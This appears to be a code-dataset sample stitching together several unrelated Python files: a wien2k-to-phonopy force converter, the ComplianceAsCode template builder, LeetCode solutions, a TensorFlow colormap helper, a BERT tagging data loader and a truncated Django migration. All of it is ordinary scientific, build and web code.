self.attributes.append(BlueprintAttribute("scriptableValues","sima/sima/ScriptableValue","",True,Dimension("*")))
self.attributes.append(Attribute("negativeInverseSlope","number","Negative inverse slope of S-N curve",default=0.0))
self.attributes.append(Attribute("transitionPointLog","number","log10 of number of cycles at transition point between preceding curve segment and this curve segment",default=0.0))
|
StarcoderdataPython
|
6577440
|
#!/usr/bin/env python
from scipy import *
from scipy.linalg import *
import utils
import os, re, sys
def Print(Us):
for i in range(shape(Us)[0]):
print ' ',
for j in range(shape(Us)[1]):
print "%11.8f " % Us[i,j],
print
def Get_BR1_DIR(case):
file = case+'.outputd'
found = False
if os.path.exists(file) and os.path.getsize(file)>0:
fi = open(file,'r')
lines = fi.readlines()
for il,line in enumerate(lines):
if re.search('BR1_DIR',line):
found = True
break
if found:
a1 = map(float,lines[il+1].split())
a2 = map(float,lines[il+2].split())
a3 = map(float,lines[il+3].split())
return vstack( (a1,a2,a3) ).transpose()
file = case+'.rotlm'
if os.path.exists(file) and os.path.getsize(file)>0:
fi = open(file,'r')
fi.next()
b1 = map(float, fi.next().split())
b2 = map(float, fi.next().split())
b3 = map(float, fi.next().split())
BR1 = vstack( (b1,b2,b3) )
S2C = inv(BR1)*2*pi
return S2C
def read_POSCAR(file):
fi = open(file, 'r')
fi.next()
a = float(fi.next().split()[0])
a1 = map(float, fi.next().split())
a2 = map(float, fi.next().split())
a3 = map(float, fi.next().split())
vaspbasis = vstack( (a1,a2,a3) ).transpose()
return vaspbasis
def read_w2k_disp(strfile):
fi = open(strfile, 'r')
for i in range(4):
fi.next()
line = fi.next() # should be first atoms
# Here we assume that the first atom is displaced away from (0,0,0).
# This should be generalized!
ii = int(line[4:8])
disp = zeros(3)
for i,col in enumerate(12+13*arange(3)):
disp[i] = float( line[col:col+10])
return disp
def read_disp_yaml(filename):
fi = open(filename, 'r')
lines = fi.readlines()
nat = int(lines[0].split()[1])
disp=[]
iat_disp=[]
c=2
for i in range(nat):
iat = lines[c].split()[2]
vdir = eval(lines[c+2])
vdis = eval(lines[c+4])
disp.append( vdis )
iat_disp.append(iat)
c += 5
if lines[c][:6] != '- atom': break
if lines[c][:7] != 'lattice':
print 'Something wrong reading', filename
c+=1
vaspbasis=zeros((3,3))
for i in range(3):
ai = eval(lines[c+i][2:])
vaspbasis[i,:] = array(ai)
vaspbasis = vaspbasis.transpose()
return (vaspbasis, disp)
def grepForce(filename):
fi = open(filename, 'r')
lines = fi.readlines()
if lines[-1][:7]!=':FCHECK':
print 'ERROR: ', filename, 'does not contain forces at the end'
frl = [] # forces in lattice basis
c=2
for i in range(2,1000):
c+=1
if lines[-i][:4]!=':FGL':
break
frl.append( map(float,lines[-i].split()[2:5]) )
frl = frl[::-1]
frc=[] # forces in cartesian basis
for i in range(c,1000):
if lines[-i][:4]!=':FCA':
break
frc.append( map(float,lines[-i].split()[2:5]) )
frc = frc[::-1]
return [array(frc), array(frl)]
au_2_angs = 0.52917721067
Ry2eV = 13.605693009
if __name__ == '__main__':
POSCAR_file = 'POSCAR-001'
(vaspbasis, dispVasp) = read_disp_yaml('disp.yaml')
w2k = utils.W2kEnvironment()
S2C = Get_BR1_DIR(w2k.case)
print 'S2C='
Print(S2C)
S2C *= au_2_angs
#vaspbasis = read_POSCAR(POSCAR_file)
Vw2k = det(S2C)
Vvasp = det(vaspbasis)
print 'Volume of wien2k primitive cell is %10.4f' % Vw2k
print 'Volume of vasp primitive cell is %10.4f' % Vvasp
if abs(Vw2k/Vvasp-1.)/Vw2k > 1e-4:
print 'ERROR : Volumes of the two unit cells are very different'
sys.exit(1)
# This transformation takes a vector expressed in cartesian coordinates in w2k and transforms it to
# cartesian coordinates in Vasp.
# Note that if vector is expressed in lattice vectors (call it r), than we just apply vaspbasis*r
M = dot(vaspbasis, inv(S2C) )
print "rotation matrix from w2kbasis_BR1 to vaspbasis is"
Print(M)
detM = det(M)
print 'and its determinant is', detM
print 'check of unitarity : '
Print( dot(M.T,M) )
force,forcel = grepForce(w2k.case+'.scf')
print 'force in cartesian coordinates extracted from case.scf file :'
Print(force)
disp = read_w2k_disp(w2k.case+'.struct') # This must be generalized
print 'Displacement extracted from case.struct file', disp
disp_w2k = dot(S2C, disp) # to cartesian coordinates
dispVasp0 = dot(M,disp_w2k) # to Vasp lattice coordinates
#print "Unrotated displacement vector in w2k in Ang"
#print disp_w2k, 'norm is', norm(disp_w2k)
print 'Converted w2k displacement to Vasp basis is [Ang]:', "%12.8f "*3 % tuple(dispVasp0)
print 'Correct Vasp displacement from disp.yaml :', "%12.8f "*3 % tuple(dispVasp[0])
#w2k_cartesian_force = zeros( shape(forcel) )
#a=S2C[2,2]
#S2C_normalized = S2C/a
#for i in range(len(forcel)):
# w2k_cartesian_force[i] = dot(S2C_normalized, forcel[i])
#print 'w2k fore converted to cartesian coordinates:'
#Print(w2k_cartesian_force) # should be equal to force
# change to Vasp units
mRy_au_2_ev_ang = Ry2eV/1000./(au_2_angs)
force *= mRy_au_2_ev_ang
Vasp_force = zeros( shape(force) )
for i in range(len(force)):
Vasp_force[i] = dot(M, force[i])
print 'w2k forces in vaspbasis are in ev/Ang'
Print(Vasp_force)
fo = open('FORCE_SETS', 'w')
print >> fo, len(force)
print >> fo, '1'
print >> fo
print >> fo, len(dispVasp)
for i in range(len(dispVasp)):
print >> fo, '%15.8f '*3 % tuple(dispVasp[i])
for i in range(len(force)):
print >> fo, '%15.8f '*3 % tuple(Vasp_force[i])
fo.close()
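# Worked check of the mRy/a.u. -> eV/Angstrom conversion used above, from the
# constants defined in this script:
#   mRy_au_2_ev_ang = 13.605693009 eV / 1000 / 0.52917721067 Angstrom ~= 0.025711
# so a wien2k force component of 10 mRy/a.u. corresponds to roughly 0.257 eV/Ang.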
|
StarcoderdataPython
|
193316
|
from __future__ import print_function
import os
import sys
import re
import ssg.build_yaml
import ssg.jinja
import ssg.utils
import ssg.yaml
languages = ["anaconda", "ansible", "bash", "oval", "puppet", "ignition"]
lang_to_ext_map = {
"anaconda": ".anaconda",
"ansible": ".yml",
"bash": ".sh",
"oval": ".xml",
"puppet": ".pp",
"ignition": ".yml"
}
def sanitize_input(string):
return re.sub(r'[\W_]', '_', string)
templates = dict()
def template(langs):
def decorator_template(func):
func.langs = langs
templates[func.__name__] = func
return func
return decorator_template
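# Illustrative sketch of what the decorator above does (hypothetical template name;
# the real callbacks are registered below):
#
# @template(["bash", "oval"])
# def example_template(data, lang):
#     # receives the rule's "vars:" dict plus the target language, may adjust or
#     # validate it, and must return the processed dict
#     return data
#
# afterwards templates["example_template"] is the callback and
# templates["example_template"].langs == ["bash", "oval"]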
# Callback functions for processing template parameters and/or validating them
@template(["ansible", "bash", "oval"])
def accounts_password(data, lang):
if lang == "oval":
data["sign"] = "-?" if data["variable"].endswith("credit") else ""
return data
@template(["ansible", "bash", "oval"])
def auditd_lineinfile(data, lang):
missing_parameter_pass = data["missing_parameter_pass"]
if missing_parameter_pass == "true":
missing_parameter_pass = True
elif missing_parameter_pass == "false":
missing_parameter_pass = False
data["missing_parameter_pass"] = missing_parameter_pass
return data
@template(["ansible", "bash", "oval"])
def audit_rules_dac_modification(data, lang):
return data
@template(["ansible", "bash", "oval"])
def audit_rules_file_deletion_events(data, lang):
return data
@template(["ansible", "bash", "oval"])
def audit_rules_login_events(data, lang):
path = data["path"]
name = re.sub(r'[-\./]', '_', os.path.basename(os.path.normpath(path)))
data["name"] = name
if lang == "oval":
data["path"] = path.replace("/", "\\/")
return data
@template(["ansible", "bash", "oval"])
def audit_rules_path_syscall(data, lang):
if lang == "oval":
pathid = re.sub(r'[-\./]', '_', data["path"])
# remove root slash made into '_'
pathid = pathid[1:]
data["pathid"] = pathid
return data
@template(["ansible", "bash", "oval"])
def audit_rules_privileged_commands(data, lang):
path = data["path"]
name = re.sub(r"[-\./]", "_", os.path.basename(path))
data["name"] = name
if lang == "oval":
data["id"] = data["_rule_id"]
data["title"] = "Record Any Attempts to Run " + name
data["path"] = path.replace("/", "\\/")
return data
@template(["ansible", "bash", "oval"])
def audit_rules_unsuccessful_file_modification(data, lang):
return data
@template(["oval"])
def audit_rules_unsuccessful_file_modification_o_creat(data, lang):
return data
@template(["oval"])
def audit_rules_unsuccessful_file_modification_o_trunc_write(data, lang):
return data
@template(["oval"])
def audit_rules_unsuccessful_file_modification_rule_order(data, lang):
return data
@template(["ansible", "bash", "oval"])
def audit_rules_usergroup_modification(data, lang):
path = data["path"]
name = re.sub(r'[-\./]', '_', os.path.basename(path))
data["name"] = name
if lang == "oval":
data["path"] = path.replace("/", "\\/")
return data
def _file_owner_groupowner_permissions_regex(data):
data["is_directory"] = data["filepath"].endswith("/")
if "missing_file_pass" not in data:
data["missing_file_pass"] = False
if "file_regex" in data and not data["is_directory"]:
raise ValueError(
"Used 'file_regex' key in rule '{0}' but filepath '{1}' does not "
"specify a directory. Append '/' to the filepath or remove the "
"'file_regex' key.".format(data["_rule_id"], data["filepath"]))
@template(["ansible", "bash", "oval"])
def file_groupowner(data, lang):
_file_owner_groupowner_permissions_regex(data)
if lang == "oval":
data["fileid"] = data["_rule_id"].replace("file_groupowner", "")
return data
@template(["ansible", "bash", "oval"])
def file_owner(data, lang):
_file_owner_groupowner_permissions_regex(data)
if lang == "oval":
data["fileid"] = data["_rule_id"].replace("file_owner", "")
return data
@template(["ansible", "bash", "oval"])
def file_permissions(data, lang):
_file_owner_groupowner_permissions_regex(data)
if lang == "oval":
data["fileid"] = data["_rule_id"].replace("file_permissions", "")
# build the state that describes our mode
# mode_str maps to STATEMODE in the template
mode = data["filemode"]
fields = [
'oexec', 'owrite', 'oread', 'gexec', 'gwrite', 'gread',
'uexec', 'uwrite', 'uread', 'sticky', 'sgid', 'suid']
mode_int = int(mode, 8)
mode_str = ""
for field in fields:
if mode_int & 0x01 == 1:
mode_str = (
" <unix:" + field + " datatype=\"boolean\">true</unix:"
+ field + ">\n" + mode_str)
else:
mode_str = (
" <unix:" + field + " datatype=\"boolean\">false</unix:"
+ field + ">\n" + mode_str)
mode_int = mode_int >> 1
data["statemode"] = mode_str
return data
@template(["ansible", "bash", "oval"])
def grub2_bootloader_argument(data, lang):
data["arg_name_value"] = data["arg_name"] + "=" + data["arg_value"]
return data
@template(["ansible", "bash", "oval"])
def kernel_module_disabled(data, lang):
return data
@template(["anaconda", "oval"])
def mount(data, lang):
data["pointid"] = re.sub(r'[-\./]', '_', data["mountpoint"])
return data
def _mount_option(data, lang):
if lang == "oval":
data["pointid"] = re.sub(r"[-\./]", "_", data["mountpoint"]).lstrip("_")
else:
data["mountoption"] = re.sub(" ", ",", data["mountoption"])
return data
@template(["anaconda", "ansible", "bash", "oval"])
def mount_option(data, lang):
return _mount_option(data, lang)
@template(["ansible", "bash", "oval"])
def mount_option_remote_filesystems(data, lang):
if lang == "oval":
data["mountoptionid"] = sanitize_input(data["mountoption"])
return _mount_option(data, lang)
@template(["anaconda", "ansible", "bash", "oval"])
def mount_option_removable_partitions(data, lang):
return _mount_option(data, lang)
@template(["anaconda", "ansible", "bash", "oval", "puppet"])
def package_installed(data, lang):
if "evr" in data:
evr = data["evr"]
if evr and not re.match(r'\d:\d[\d\w+.]*-\d[\d\w+.]*', evr, 0):
raise RuntimeError(
"ERROR: input violation: evr key should be in "
"epoch:version-release format, but package {0} has set "
"evr to {1}".format(data["pkgname"], evr))
return data
@template(["ansible", "bash", "oval"])
def sysctl(data, lang):
data["sysctlid"] = re.sub(r'[-\.]', '_', data["sysctlvar"])
if not data.get("sysctlval"):
data["sysctlval"] = ""
ipv6_flag = "P"
if data["sysctlid"].find("ipv6") >= 0:
ipv6_flag = "I"
data["flags"] = "SR" + ipv6_flag
return data
@template(["anaconda", "ansible", "bash", "oval", "puppet"])
def package_removed(data, lang):
return data
@template(["ansible", "bash", "oval"])
def sebool(data, lang):
sebool_bool = data.get("sebool_bool", None)
if sebool_bool is not None and sebool_bool not in ["true", "false"]:
raise ValueError(
"ERROR: key sebool_bool in rule {0} contains forbidden "
"value '{1}'.".format(data["_rule_id"], sebool_bool)
)
return data
@template(["ansible", "bash", "oval", "puppet"])
def service_disabled(data, lang):
if "packagename" not in data:
data["packagename"] = data["servicename"]
if "daemonname" not in data:
data["daemonname"] = data["servicename"]
if "mask_service" not in data:
data["mask_service"] = "true"
return data
@template(["ansible", "bash", "oval", "puppet"])
def service_enabled(data, lang):
if "packagename" not in data:
data["packagename"] = data["servicename"]
if "daemonname" not in data:
data["daemonname"] = data["servicename"]
return data
@template(["ansible", "bash", "oval"])
def sshd_lineinfile(data, lang):
missing_parameter_pass = data["missing_parameter_pass"]
if missing_parameter_pass == "true":
missing_parameter_pass = True
elif missing_parameter_pass == "false":
missing_parameter_pass = False
data["missing_parameter_pass"] = missing_parameter_pass
return data
@template(["ansible", "bash", "oval"])
def shell_lineinfile(data, lang):
value = data["value"]
if value[0] in ("'", '"') and value[0] == value[-1]:
msg = (
"Value >>{value}<< of shell variable '{varname}' "
"has been supplied with quotes, please fix the content - "
"shell quoting is handled by the check/remediation code."
.format(value=value, varname=data["parameter"]))
raise Exception(msg)
missing_parameter_pass = data.get("missing_parameter_pass", "false")
if missing_parameter_pass == "true":
missing_parameter_pass = True
elif missing_parameter_pass == "false":
missing_parameter_pass = False
data["missing_parameter_pass"] = missing_parameter_pass
no_quotes = False
if data["no_quotes"] == "true":
no_quotes = True
data["no_quotes"] = no_quotes
return data
@template(["ansible", "bash", "oval"])
def timer_enabled(data, lang):
if "packagename" not in data:
data["packagename"] = data["timername"]
return data
class Builder(object):
"""
Class for building all templated content for a given product.
To generate content from templates, pass the env_yaml, path to the
directory with resolved rule YAMLs, path to the directory that contains
templates, path to the output directory for checks and a path to the
output directory for remediations into the constructor. Then, call the
method build() to perform a build.
"""
def __init__(
self, env_yaml, resolved_rules_dir, templates_dir,
remediations_dir, checks_dir):
self.env_yaml = env_yaml
self.resolved_rules_dir = resolved_rules_dir
self.templates_dir = templates_dir
self.remediations_dir = remediations_dir
self.checks_dir = checks_dir
self.output_dirs = dict()
for lang in languages:
if lang == "oval":
# OVAL checks need to be put to a different directory because
# they are processed differently than remediations later in the
# build process
output_dir = self.checks_dir
else:
output_dir = self.remediations_dir
dir_ = os.path.join(output_dir, lang)
self.output_dirs[lang] = dir_
def preprocess_data(self, template, lang, raw_parameters):
"""
Processes template data using a callback before the data will be
substituted into the Jinja template.
"""
template_func = templates[template]
parameters = template_func(raw_parameters.copy(), lang)
# TODO: Remove this right after the variables in templates are renamed
# to lowercase
uppercases = dict()
for k, v in parameters.items():
uppercases[k.upper()] = v
return uppercases
def build_lang(
self, rule_id, template_name, template_vars, lang, local_env_yaml):
"""
Builds templated content for a given rule for a given language.
Writes the output to the correct build directories.
"""
template_func = templates[template_name]
if lang not in template_func.langs:
return
template_file_name = "template_{0}_{1}".format(
lang.upper(), template_name)
template_file_path = os.path.join(
self.templates_dir, template_file_name)
if not os.path.exists(template_file_path):
raise RuntimeError(
"Rule {0} wants to generate {1} content from template {2}, "
"but file {3} which provides this template does not "
"exist.".format(
rule_id, lang, template_name, template_file_path)
)
ext = lang_to_ext_map[lang]
output_file_name = rule_id + ext
output_filepath = os.path.join(
self.output_dirs[lang], output_file_name)
template_parameters = self.preprocess_data(
template_name, lang, template_vars)
jinja_dict = ssg.utils.merge_dicts(local_env_yaml, template_parameters)
filled_template = ssg.jinja.process_file_with_macros(
template_file_path, jinja_dict)
with open(output_filepath, "w") as f:
f.write(filled_template)
def get_langs_to_generate(self, rule):
"""
For a given rule returns list of languages that should be generated
from templates. This is controlled by "template_backends" in rule.yml.
"""
if "backends" in rule.template:
backends = rule.template["backends"]
for lang in backends:
if lang not in languages:
                    raise RuntimeError(
                        "Rule {0} wants to generate unknown language '{1}' "
                        "from a template.".format(rule.id_, lang)
                    )
langs_to_generate = []
for lang in languages:
backend = backends.get(lang, "on")
if backend == "on":
langs_to_generate.append(lang)
return langs_to_generate
else:
return languages
def build_rule(self, rule_id, rule_title, template, langs_to_generate):
"""
Builds templated content for a given rule for selected languages,
writing the output to the correct build directories.
"""
try:
template_name = template["name"]
except KeyError:
raise ValueError(
"Rule {0} is missing template name under template key".format(
rule_id))
if template_name not in templates:
raise ValueError(
"Rule {0} uses template {1} which does not exist.".format(
rule_id, template_name))
try:
template_vars = template["vars"]
except KeyError:
raise ValueError(
"Rule {0} does not contain mandatory 'vars:' key under "
"'template:' key.".format(rule_id))
# Add the rule ID which will be reused in OVAL templates as OVAL
# definition ID so that the build system matches the generated
# check with the rule.
template_vars["_rule_id"] = rule_id
# checks and remediations are processed with a custom YAML dict
local_env_yaml = self.env_yaml.copy()
local_env_yaml["rule_id"] = rule_id
local_env_yaml["rule_title"] = rule_title
local_env_yaml["products"] = self.env_yaml["product"]
for lang in langs_to_generate:
self.build_lang(
rule_id, template_name, template_vars, lang, local_env_yaml)
def build_extra_ovals(self):
declaration_path = os.path.join(self.templates_dir, "extra_ovals.yml")
declaration = ssg.yaml.open_raw(declaration_path)
for oval_def_id, template in declaration.items():
langs_to_generate = ["oval"]
# Since OVAL definition ID in shorthand format is always the same
# as rule ID, we can use it instead of the rule ID even if no rule
# with that ID exists
self.build_rule(
oval_def_id, oval_def_id, template, langs_to_generate)
def build_all_rules(self):
for rule_file in os.listdir(self.resolved_rules_dir):
rule_path = os.path.join(self.resolved_rules_dir, rule_file)
try:
rule = ssg.build_yaml.Rule.from_yaml(rule_path, self.env_yaml)
except ssg.build_yaml.DocumentationNotComplete:
# Happens on non-debug build when a rule is "documentation-incomplete"
continue
if rule.template is None:
# rule is not templated, skipping
continue
langs_to_generate = self.get_langs_to_generate(rule)
self.build_rule(
rule.id_, rule.title, rule.template, langs_to_generate)
def build(self):
"""
Builds all templated content for all languages, writing
the output to the correct build directories.
"""
for dir_ in self.output_dirs.values():
if not os.path.exists(dir_):
os.makedirs(dir_)
self.build_extra_ovals()
self.build_all_rules()
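# A minimal usage sketch (not part of the original module): the env_yaml object
# and all paths below are illustrative placeholders -- in the real build they
# are supplied by the surrounding build system.
#
#   builder = Builder(
#       env_yaml,
#       "/build/product/rules",                  # resolved rule YAMLs
#       "/src/shared/templates",                 # directory with template_* files
#       "/build/product/fixes_from_templates",   # remediation output
#       "/build/product/checks_from_templates",  # OVAL check output
#   )
#   builder.build()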
|
StarcoderdataPython
|
3454519
|
<gh_stars>1-10
#%%
"""
- Find the Difference
- https://leetcode.com/problems/find-the-difference/
- Easy
Given two strings s and t which consist of only lowercase letters.
String t is generated by randomly shuffling string s and then adding one more letter at a random position.
Find the letter that was added in t.
Example:
Input:
s = "abcd"
t = "abcde"
Output:
e
Explanation:
'e' is the letter that was added.
"""
#%%
##
class S1:
def findTheDifference(self, s, t):
"""
:type s: str
:type t: str
:rtype: str
"""
m = sorted(s)
n = sorted(t)
for i in range(len(m)):
if m[i] != n[i]:
return n[i]
return n[-1]
#%%
class S2:
def findTheDifference(self, s, t):
res = {}
for i in s:
res[i] = res.get(i,0) + 1
for j in t:
res[j] = res.get(j,0) - 1
for key in res:
if abs(res[key]) == 1:
return key
#%%
class S3:
def findTheDifference(self, s, t):
from collections import Counter
return list((Counter(t) - Counter(s)).keys()).pop()
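#%%
# Extra approach, not in the original snippet: XOR the character codes of both
# strings; every character present in both s and t cancels out, leaving only
# the added letter. O(n) time, O(1) extra space.
class S4:
    def findTheDifference(self, s, t):
        from functools import reduce
        from operator import xor
        return chr(reduce(xor, map(ord, s + t)))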
|
StarcoderdataPython
|
3546252
|
<filename>lib/tf_colormap.py
import numpy as np
import tensorflow as tf
import matplotlib.cm
def tf_cmap_nearest(data, map, min_val=0., max_val=1.):
map = matplotlib.cm.get_cmap(map).colors
map = tf.constant(map, dtype=tf.float32)
data = tf.clip_by_value(data, min_val, max_val)
#normalize to [0,1]
data = (data - min_val) / (max_val - min_val)
#quantize
data *= map.get_shape().as_list()[0]-1
data = tf.cast(data, dtype=tf.int32)
#map
return tf.reduce_mean(tf.gather(map, data), axis=-2)
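if __name__ == "__main__":
    # Quick self-check sketch (assumes TF 2.x eager execution; 'viridis' is a
    # ListedColormap, so the .colors attribute used above is available).
    demo = tf.random.uniform([2, 8, 8, 1])   # values already in [0, 1]
    rgb = tf_cmap_nearest(demo, 'viridis')
    print(rgb.shape)                         # expected: (2, 8, 8, 3)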
|
StarcoderdataPython
|
3221525
|
"""Data loader"""
import os
import torch
import utils
import random
import numpy as np
from transformers import BertTokenizer
class DataLoader(object):
def __init__(self, data_dir, bert_class, params, token_pad_idx=0, tag_pad_idx=-1):
self.data_dir = data_dir
self.batch_size = params.batch_size
self.max_len = params.max_len
self.device = params.device
self.seed = params.seed
self.token_pad_idx = token_pad_idx
self.tag_pad_idx = tag_pad_idx
tags = self.load_tags()
self.tag2idx = {tag: idx for idx, tag in enumerate(tags)}
self.idx2tag = {idx: tag for idx, tag in enumerate(tags)}
params.tag2idx = self.tag2idx
params.idx2tag = self.idx2tag
self.tokenizer = BertTokenizer.from_pretrained(bert_class, do_lower_case=False)
def load_tags(self):
tags = []
file_path = os.path.join(self.data_dir, 'tags.txt')
with open(file_path, 'r') as file:
for tag in file:
tags.append(tag.strip())
return tags
def load_sentences_tags(self, sentences_file, tags_file, d):
"""Loads sentences and tags from their corresponding files.
Maps tokens and tags to their indices and stores them in the provided dict d.
"""
sentences = []
tags = []
with open(sentences_file, 'r') as file:
for line in file:
# replace each token by its index
tokens = line.strip().split(' ')
subwords = list(map(self.tokenizer.tokenize, tokens))
subword_lengths = list(map(len, subwords))
                subwords = ['[CLS]'] + [item for indices in subwords for item in indices]  # prepend BERT's [CLS] special token
token_start_idxs = 1 + np.cumsum([0] + subword_lengths[:-1])
sentences.append((self.tokenizer.convert_tokens_to_ids(subwords),token_start_idxs))
if tags_file != None:
with open(tags_file, 'r') as file:
for line in file:
# replace each tag by its index
tag_seq = [self.tag2idx.get(tag) for tag in line.strip().split(' ')]
tags.append(tag_seq)
# checks to ensure there is a tag for each token
assert len(sentences) == len(tags)
for i in range(len(sentences)):
assert len(tags[i]) == len(sentences[i][-1])
d['tags'] = tags
# storing sentences and tags in dict d
d['data'] = sentences
d['size'] = len(sentences)
def load_data(self, data_type):
"""Loads the data for each type in types from data_dir.
Args:
            data_type: (str) one of 'train', 'val', 'test' or 'interactive', depending on which data is required.
Returns:
data: (dict) contains the data with tags for each type in types.
"""
data = {}
if data_type in ['train', 'val', 'test']:
print('Loading ' + data_type)
sentences_file = os.path.join(self.data_dir, data_type, 'sentences.txt')
tags_path = os.path.join(self.data_dir, data_type, 'tags.txt')
self.load_sentences_tags(sentences_file, tags_path, data)
elif data_type == 'interactive':
sentences_file = os.path.join(self.data_dir, data_type, 'sentences.txt')
self.load_sentences_tags(sentences_file, tags_file=None, d=data)
else:
raise ValueError("data type not in ['train', 'val', 'test']")
return data
def data_iterator(self, data, shuffle=False):
"""Returns a generator that yields batches data with tags.
Args:
data: (dict) contains data which has keys 'data', 'tags' and 'size'
shuffle: (bool) whether the data should be shuffled
Yields:
batch_data: (tensor) shape: (batch_size, max_len)
batch_tags: (tensor) shape: (batch_size, max_len)
"""
# make a list that decides the order in which we go over the data- this avoids explicit shuffling of data
order = list(range(data['size']))
if shuffle:
random.seed(self.seed)
random.shuffle(order)
interMode = False if 'tags' in data else True
if data['size'] % self.batch_size == 0:
BATCH_NUM = data['size']//self.batch_size
else:
BATCH_NUM = data['size']//self.batch_size + 1
# one pass over data
for i in range(BATCH_NUM):
# fetch sentences and tags
if i * self.batch_size < data['size'] < (i+1) * self.batch_size:
sentences = [data['data'][idx] for idx in order[i*self.batch_size:]]
if not interMode:
tags = [data['tags'][idx] for idx in order[i*self.batch_size:]]
else:
sentences = [data['data'][idx] for idx in order[i*self.batch_size:(i+1)*self.batch_size]]
if not interMode:
tags = [data['tags'][idx] for idx in order[i*self.batch_size:(i+1)*self.batch_size]]
# batch length
batch_len = len(sentences)
# compute length of longest sentence in batch
batch_max_subwords_len = max([len(s[0]) for s in sentences])
max_subwords_len = min(batch_max_subwords_len, self.max_len)
max_token_len = 0
# prepare a numpy array with the data, initialising the data with pad_idx
batch_data = self.token_pad_idx * np.ones((batch_len, max_subwords_len))
batch_token_starts = []
# copy the data to the numpy array
for j in range(batch_len):
cur_subwords_len = len(sentences[j][0])
if cur_subwords_len <= max_subwords_len:
batch_data[j][:cur_subwords_len] = sentences[j][0]
else:
batch_data[j] = sentences[j][0][:max_subwords_len]
token_start_idx = sentences[j][-1]
token_starts = np.zeros(max_subwords_len)
token_starts[[idx for idx in token_start_idx if idx < max_subwords_len]] = 1
batch_token_starts.append(token_starts)
max_token_len = max(int(sum(token_starts)), max_token_len)
if not interMode:
batch_tags = self.tag_pad_idx * np.ones((batch_len, max_token_len))
for j in range(batch_len):
cur_tags_len = len(tags[j])
if cur_tags_len <= max_token_len:
batch_tags[j][:cur_tags_len] = tags[j]
else:
batch_tags[j] = tags[j][:max_token_len]
# since all data are indices, we convert them to torch LongTensors
batch_data = torch.tensor(batch_data, dtype=torch.long)
batch_token_starts = torch.tensor(batch_token_starts, dtype=torch.long)
if not interMode:
batch_tags = torch.tensor(batch_tags, dtype=torch.long)
# shift tensors to GPU if available
batch_data, batch_token_starts = batch_data.to(self.device), batch_token_starts.to(self.device)
if not interMode:
batch_tags = batch_tags.to(self.device)
yield batch_data, batch_token_starts, batch_tags
else:
yield batch_data, batch_token_starts
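# Minimal usage sketch (not part of the original module; paths and the model
# name are illustrative). It assumes a params object exposing batch_size,
# max_len, device and seed, and a data_dir laid out as
# <data_dir>/{train,val,test}/sentences.txt (+ tags.txt) plus a top-level
# tags.txt with the tag vocabulary:
#
#   loader = DataLoader('data/conll', 'bert-base-cased', params)
#   train_data = loader.load_data('train')
#   for batch_data, batch_token_starts, batch_tags in loader.data_iterator(train_data, shuffle=True):
#       ...  # feed the batch to the model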
|
StarcoderdataPython
|
5074583
|
# Generated by Django 2.2 on 2020-02-18 15:36
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import resource_inventory.models
def clear_resource_bundles(apps, schema_editor):
ResourceBundle = apps.get_model('resource_inventory', 'ResourceBundle')
for rb in ResourceBundle.objects.all():
rb.template = None
rb.save()
def create_default_template(apps, schema_editor):
ResourceTemplate = apps.get_model('resource_inventory', 'ResourceTemplate')
ResourceTemplate.objects.create(name="Default Template", hidden=True)
def populate_servers(apps, schema_editor):
"""Convert old Host models to Server Resources."""
Host = apps.get_model('resource_inventory', 'Host')
Server = apps.get_model('resource_inventory', 'Server')
ResourceProfile = apps.get_model('resource_inventory', 'ResourceProfile')
for h in Host.objects.all():
rp = ResourceProfile.objects.get(id=h.profile.id)
server = Server.objects.create(
working=h.working,
vendor=h.vendor,
labid=h.labid,
booked=h.booked,
name=h.labid,
lab=h.lab,
profile=rp
)
for iface in h.interfaces.all():
server.interfaces.add(iface)
def populate_resource_templates(apps, schema_editor):
"""
Convert old GenericResourceBundles to ResourceTemplate.
This will be kept blank for now. If, during testing, we realize
we want to implement this, we will. For now, it seems
fine to let the old models just die and create
new ones as needed.
"""
pass
def populate_resource_profiles(apps, schema_editor):
"""
Convert old HostProfile models to ResourceProfiles.
Also updates all the foreign keys pointed to the old
host profile. This change was basically only a name change.
"""
HostProfile = apps.get_model('resource_inventory', 'HostProfile')
ResourceProfile = apps.get_model('resource_inventory', 'ResourceProfile')
for hp in HostProfile.objects.all():
rp = ResourceProfile.objects.create(id=hp.id, name=hp.name, description=hp.description)
rp.labs.add(*list(hp.labs.all()))
"""
TODO: link these models together
rp.interfaceprofile = hp.interfaceprofile
rp.storageprofile = hp.storageprofile
rp.cpuprofile = hp.cpuprofile
rp.ramprofile = hp.ramprofile
rp.save()
hp.interfaceprofile.host = rp
rp.storageprofile.host = rp
rp.cpuprofile.host = rp
rp.ramprofile.host = rp
rp.interfaceprofile.save()
rp.storageprofile.save()
rp.cpuprofile.save()
rp.ramprofile.save()
"""
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('booking', '0007_remove_booking_config_bundle'),
('account', '0004_downtime'),
('api', '0013_manual_20200218_1536'),
('resource_inventory', '0012_manual_20200218_1536'),
]
operations = [
migrations.CreateModel(
name='InterfaceConfiguration',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('connections', models.ManyToManyField(to='resource_inventory.NetworkConnection')),
],
),
migrations.CreateModel(
name='ResourceConfiguration',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('is_head_node', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='ResourceOPNFVConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='ResourceProfile',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=200, unique=True)),
('description', models.TextField()),
('labs', models.ManyToManyField(related_name='resourceprofiles', to='account.Lab')),
],
),
migrations.RunPython(populate_resource_profiles),
migrations.CreateModel(
name='ResourceTemplate',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=300, unique=True)),
('xml', models.TextField()),
('description', models.CharField(default='', max_length=1000)),
('public', models.BooleanField(default=False)),
('hidden', models.BooleanField(default=False)),
('lab', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='resourcetemplates', to='account.Lab')),
('owner', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
),
migrations.RunPython(populate_resource_templates),
migrations.CreateModel(
name='Server',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('working', models.BooleanField(default=True)),
('vendor', models.CharField(default='unknown', max_length=100)),
('model', models.CharField(default='unknown', max_length=150)),
